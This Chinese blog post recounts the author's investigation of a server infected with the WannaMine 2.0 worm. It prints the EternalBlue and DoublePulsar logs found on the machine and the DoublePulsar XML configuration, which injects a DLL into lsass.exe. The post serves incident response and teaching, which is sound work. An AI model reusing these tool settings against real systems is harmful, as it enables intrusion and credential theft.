近期用户反馈某台服务器总感觉性能不是很好存在卡顿,于是今天远程上去分析。

打开任务管理器发现CPU使用率非常低,内存使用也在接受范围内(10/64G)。不过我有一个偏好就是不喜欢用系统自带的任务管理器查看资源,顺手把procexp搞上去再看一遍。发现rundll32.exe显示占用了62%左右的CPU资源,加载执行一个名为HalPluginServices.dll。之前看过《深入解析Windows操作系统》,就对前缀Hal(Hardware Abstraction Layer)有个概念。和它并行在svhost.exe下运行的还有spoolsv.exe,第一眼看都是挺系统级的执行文件。移动鼠标到spoolsv.exe查看它的运行路径,显示:C:\Windows\SpeechsTracing\spoolsv.exe。看到Speech前缀我心想是不是微软的讲述人相关功能,碰巧打开目录下面还有一个Microsoft子目录,这时候差点信以为真。但我注意到spoolsv.exe会执行cmd,好奇查看了一下是什么命令:

C:\Windows\SpeechsTracing\Microsoft\svhost.exe > stage1.txt

出于好奇心紧接着打开stage1.txt,看到如下内容:

[*] Connecting to target for exploitation.

    [+] Connection established for exploitation.

[*] Pinging backdoor...

    [+] Backdoor not installed, game on.

[*] Target OS selected valid for OS indicated by SMB reply

[*] CORE raw buffer dump ( bytes):

0x00000000    6e  6f             Windows Server

0x00000010          6e          R2 Enterpris

0x00000020                   e  Service P

0x00000030    6b                                   ack .

[*] Building exploit buffer

[*] Sending all but last fragment of exploit packet

    ................DONE.

[*] Sending SMB Echo request

[*] Good reply from SMB Echo request

[*] Starting non-paged pool grooming

    [+] Sending SMBv2 buffers

        ..........DONE.

    [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] Sending SMB Echo request

[*] Good reply from SMB Echo request

[*] Sending last fragment of exploit packet!

    DONE.

[*] Receiving response from exploit packet

这不正是一个SMB攻击,再看一下同目录下的stage2.txt:

[+] Selected Protocol SMB

[.] Connecting to target...

[+] Connected to target, pinging backdoor...

    [+] Backdoor returned code:  - Success!

    [+] Ping returned Target architecture: x64 (-bit) - XOR Key: 0xEE83B3A2

    SMB Connection string is: Windows Server  R2 Enterprise  Service Pack

    Target OS is:  R2 x64

    Target SP is:

    [+] Backdoor installed

    [+] DLL built

    [.] Sending shellcode to inject DLL

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Command completed successfully

<config xmlns="urn:trch" id="a748cf79831d6c2444050f18217611549fe3f619" configversion="1.3.1.0" name="Doublepulsar" version="1.3.1" schemaversion="2.0.0">

  <inputparameters>

    <parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds).  Use -1 for no timeout." type="S16" format="Scalar" valid="true">

      <default></default>

      <value></value>

    </parameter>

    <parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true">

      <value>10.244.251.57</value>

    </parameter>

    <parameter name="TargetPort" description="Port used by the Double Pulsar back door" type="TcpPort" format="Scalar" valid="true">

      <default></default>

      <value></value>

    </parameter>

    <parameter name="LogFile" description="Where to write log file" type="String" format="Scalar" required="false"></parameter>

    <parameter name="OutConfig" description="Where to write output parameters file" type="String" format="Scalar" valid="true">

      <default>stdout</default>

      <value>stdout</value>

    </parameter>

    <parameter name="ValidateOnly" description="Stop execution after parameter validation" type="Boolean" format="Scalar" valid="true">

      <default>false</default>

      <value>false</value>

    </parameter>

    <paramchoice name="Protocol" description="Protocol for the backdoor to speak">

      <default>SMB</default>

      <value>SMB</value>

      <paramgroup name="SMB" description="Ring 0 SMB (TCP 445) backdoor"></paramgroup>

      <paramgroup name="RDP" description="Ring 0 RDP (TCP 3389) backdoor"></paramgroup>

    </paramchoice>

    <paramchoice name="Architecture" description="Architecture of the target OS">

      <default>x64</default>

      <value>x64</value>

      <paramgroup name="x86" description="x86 32-bits"></paramgroup>

      <paramgroup name="x64" description="x64 64-bits"></paramgroup>

    </paramchoice>

    <paramchoice name="Function" description="Operation for backdoor to perform">

      <default>OutputInstall</default>

      <value>RunDLL</value>

      <paramgroup name="OutputInstall" description="Only output the install shellcode to a binary file on disk.">

        <parameter name="OutputFile" description="Full path to the output file" type="String" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Ping" description="Test for presence of backdoor"></paramgroup>

      <paramgroup name="RunDLL" description="Use an APC to inject a DLL into a user mode process.">

        <parameter name="DllPayload" description="DLL to inject into user mode" type="LocalFile" format="Scalar" valid="true">

          <value>C:\Windows\SpeechsTracing\Microsoft\\x64.dll</value>

        </parameter>

        <parameter name="DllOrdinal" description="The exported ordinal number of the DLL being injected to call" type="U32" format="Scalar" valid="true">

          <default></default>

          <value></value>

        </parameter>

        <parameter name="ProcessName" description="Name of process to inject into" type="String" format="Scalar" valid="true">

          <default>lsass.exe</default>

          <value>lsass.exe</value>

        </parameter>

        <parameter name="ProcessCommandLine" description="Command line of process to inject into" type="String" format="Scalar" valid="true">

          <default></default>

          <value></value>

        </parameter>

      </paramgroup>

      <paramgroup name="RunShellcode" description="Run raw shellcode">

        <parameter name="ShellcodeFile" description="Full path to the file containing shellcode" type="LocalFile" format="Scalar"></parameter>

        <parameter name="ShellcodeData" description="Full path to the file containing shellcode to run" type="LocalFile" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Uninstall" description="Remove's backdoor from system"></paramgroup>

    </paramchoice>

  </inputparameters>

  <outputparameters>

    <paramchoice name="Function" description="Operation for backdoor to perform">

      <paramgroup name="OutputInstall" description="Only output the install shellcode to a file on disk.">

        <parameter name="ShellcodeFile" description="Full path to the file containing Double Pulsar shellcode installer" type="String" format="Scalar"></parameter>

        <parameter name="ShellcodeData" description="Full path to the file containing Double Pulsar shellcode installer" type="LocalFile" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Ping" description="Test for presence of backdoor">

        <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="RunDLL" description="Inject a DLL into a user mode process.">

        <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Uninstall" description="Remove's backdoor from system">

        <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>

      </paramgroup>

    </paramchoice>

  </outputparameters>

</config>

基本明白这是一个蠕虫病毒,目录下面还有之前的永恒之蓝(Eternalblue-2.2.0.fb)。这个时候我突然意识到一个现象,原来病毒作者发现用户运行任务管理器时候会自动把rundll32.exe给杀掉,造成一个系统运行占用CPU资源很少的假象,我只是运行了procexp才发现了问题。

服务器中了蠕虫病毒Wannamine2.0小记的更多相关文章

  1. Window应急响应(二):蠕虫病毒

    0x00 前言 ​ 蠕虫病毒是一种十分古老的计算机病毒,它是一种自包含的程序(或是一套程序),通常通过网络途径传播,每入侵到一台新的计算机,它就在这台计算机上复制自己,并自动执行它自身的程序. 常见的 ...

  2. 3.Windows应急响应:蠕虫病毒

    0x00 前言 蠕虫病毒是一种十分古老的计算机病毒,它是一种自包含的程序(或是一套程序),通常通过网络途径传播, 每入侵到一台新的计算机,它就在这台计算机上复制自己,并自动执行它自身的程序.常见的蠕虫 ...

  3. 30天轻松学习javaweb_Eclipse在修改了web.xml后将自动更新到tomcat服务器中

    context.xml中增加<WatchedResource>WEB-INF/web.xml</WatchedResource>,Eclipse在修改了web.xml后将自动更 ...

  4. 注册asp.net 4.0版本到IIS服务器中

    在IIS服务器的运维的过程中,有时候部署asp.net网站发现未安装.net framework对应版本信息,此时就需要重新将.net framework对应的版本注册到IIS中,此处以重新注册.ne ...

  5. [转帖]Docker Hub上镜像发现挖矿蠕虫病毒,已导致2000台主机感染

    Docker Hub上镜像发现挖矿蠕虫病毒,已导致2000台主机感染 https://www.kubernetes.org.cn/5951.html 本来想说可以用 official版本的镜像 但是一 ...

  6. 关于winlogo.exe中了“落雪”病毒的解决方法

    Windows Logon Process,Windows NT 用户登陆程序,管理用户登录和退出.该进程的正常路径应是 C:\Windows\System32 且是以 SYSTEM 用户运行,若不是 ...

  7. 云服务器ECS挖矿木马病毒处理和解决方案

    云服务器ECS挖矿木马病毒处理和解决方案 最近由于网络环境安全意识低的原因,导致一些云服务器ECS中了挖矿病毒的坑. 总结了一些解决挖矿病毒的一些思路.由于病毒更新速度快仅供参考. 1.查看cpu爆满 ...

  8. Ramnit蠕虫病毒分析和查杀

    Ramnit是一种蠕虫病毒.拥有多种传播方式,不仅可以通过网页进行传播,还可以通过感染计算机内可执行文件进行传播.该病毒在2010年第一次被安全研究者发现,从网络威胁监控中可以看出目前仍然有大量的主机 ...

  9. Trick蠕虫病毒来袭!幕后主使竟是一名高中生“黑客”!

    黑客一直是美国电影中的重要元素,很多经典大片中都有黑客的身影,如战争游戏.黑客帝国等.电影中黑客总是神通广大.行侠仗义,<战争游戏>中的年轻黑客大卫•莱特曼利用黑客技术避免引爆核武器,&l ...

随机推荐

  1. 用ndk-stack分析应用native程序异常crash掉

    adb logcat | "/home/hxl/bin/android-ndk-r10d/ndk-stack" -sym "/home/hxl/plu/BadGame/p ...

  2. tomcat管理页面403 Access Denied的解决方法

    安装tomcat,配置好tomcat环境变量以后,访问manager app页面,出现403 Access Denied错误,解决的方法如下: 首先在conf/tomcat-users.xml文件里面 ...

  3. Apache CXF JAX-WS example

    1. 环境说明 jdk 1.6.0_29 apache cxf  2.7.7 2. 新建JavaProject 3. 添加jar包,将apache cxf下面lib里面的jar包都添加到项目中(可能有 ...

  4. 在vi中搜索字符串,替换字符串

    在vi中搜索一个字符串: 输入命令:"vi test.txt"用vi打开一个文本文件. 输入命令:"/spider"用ESC键进入命令模式,然后输入一个&quo ...

  5. OpenCV3 for python3 学习笔记2

    1.安装 如果你是第一次使用OpenCV Python开发包,想要安装OpenCV Python只要执行如下命令行即可:  pip install opencv-python   如果你还想使用Ope ...

  6. UVA 12293 - Box Game(博弈)

    UVA 12293 - Box Game 题目链接 题意:两个盒子,一開始一个盒子有n个球.一个仅仅有1个球,每次把球少的盒子中球消掉,把多的拿一些球给这个盒子.最后不能操作的输(球不能少于1个),A ...

  7. Vue加载组件、动态加载组件的几种方式

    https://cn.vuejs.org/v2/guide/components.html https://cn.vuejs.org/v2/guide/components-dynamic-async ...

  8. easyui confirm提示框 调整显示位置

    方法一: $.messager.confirm("确认对话框","该客户已经存在!确定:查看该客户 ", function(r){ if(r){ alert(& ...

  9. 小白学python时候总会遇到的几个问题

    最近又在跟之前的同学一起学习python,一起进步,发现很多测试同学在初学python的时候很容易犯一些错误,特意总结了一下.其实这些错误不仅是在学python时会碰到,在学习其他语言的时候也同样会碰 ...

  10. Nginx 状态信息功能配置

    Nginx 状态信息功能介绍 Nginx 有一个 ngx_http_stub_status_module 模块,主要功能是记录 Nginx 的基本访问状态信息,让使用者了解 Nginx 的工作状态 要 ...